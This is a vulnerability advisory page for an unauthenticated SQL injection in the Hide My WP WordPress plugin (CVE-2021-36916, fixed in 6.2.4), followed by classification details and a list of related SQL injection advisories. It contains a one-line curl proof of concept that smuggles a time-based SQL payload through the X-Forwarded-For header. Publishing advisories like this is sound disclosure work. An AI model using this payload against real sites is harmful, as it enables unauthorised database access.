WordPress Plugin Vulnerabilities

Hide My WP < 6.2.4 - Unauthenticated SQLi

Description

The plugin does not validate and escape the IP address retrieved from headers before using it in SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks

Proof of Concept

curl -k --location --request GET "https://example.com.com" --header "X-Forwarded-For: 1'+(select*from(select(sleep(20)))a)+'"

Affects Plugins

Plugin icon
hide_my_wp
Fixed in 6.2.4

References

CVE
CVE-2021-36916

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
8.6 (high)

Miscellaneous

Original Researcher
Dave Jong
Verified
No
WPVDB ID
002875ec-8a0a-44d2-8987-7793e46bc22f

Timeline

Publicly Published
2021-11-24 (about 2 years ago)
Added
2022-11-30 (about 1 years ago)
Last Updated
2022-11-30 (about 1 years ago)

Other

Published
Title
Published
2014-08-01
Title
GRAND Flash Album Gallery 2.55 - "gid" SQL Injection
Published
2023-12-28
Title
WS Form LITE < 1.9.171 - Authenticated(Administrator+) SQL Injection
Published
2018-02-22
Title
Custom Permalinks <= 1.1 - Authenticated SQL Injection
Published
2017-06-11
Title
WP Jobs <= 1.4 - Authenticated SQL Injection
Published
2024-04-15
Title
Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin < 5.7.15 - Unauthenticated SQL Injection